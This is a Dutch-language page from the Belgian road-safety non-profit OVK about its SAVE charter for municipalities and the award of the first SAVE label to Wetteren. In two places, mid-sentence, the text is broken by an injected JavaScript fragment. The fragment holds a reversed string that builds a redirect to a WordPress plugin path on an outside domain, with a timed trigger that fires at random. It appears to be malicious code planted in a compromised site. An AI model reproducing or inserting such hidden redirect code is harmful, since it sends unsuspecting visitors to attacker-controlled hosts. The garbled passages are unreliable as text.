Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

uitreiking SAVE-label Wetteren

Vrijdag 20 september kreeg Wetteren als eerste gemeente het SAVE-LABEL uitgereikt. Wetteren is daarmee niet enkel de eerste gemeente die het SAVE-charter ondertekende in 2011, ze zijn ook de eerste gemeente die zich trotse eigenaar mag noemen van het SAVE-label. Schepen van Mobiliteit Herman De Wulf was met rede fier over de inspanningen die de gemeente in het voorbije jaar leverde: ‘Het bestuur en de politie leveren voortdurend inspanningen om Wetteren veiliger te maken. Ook de scholen werken actief mee aan bewustmaking door educatieve toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toneelproducties. In de zomer van 2013 heeft de vzw OVK ons actieplan positief geëvalueerd waardoor wij nu de eerste Vlaamse gemeente zijn die een SAVE-logo in ontvangst mag nemen. Voor één jaar, welteverstaan, we moeten en zullen ons blijven inzetten. Maar het stemt ons fier. Wij danken ook Roger Huylebroeck, Wetteraar en actief lid van OVK, voor zijn niet-aflatende inspanningen.’
Zoals Herman De Wulf aangaf in zijn redevoering, het ontvangen van een SAVE-label is niet het einde van het engagement dat een gemeente aangaat wanneer het een SAVE-charter ondertekend. We beogen met de ondertekening een langdurige samenwerking toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot stand te brengen tussen OVK en de gemeente in kwestie. Na een geslaagd jaaractieplan inzake verkeersveiligheid zal er met de gemeente samen gezeten worden en zullen de objectieven vooropgesteld worden voor een volgend jaarplan.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be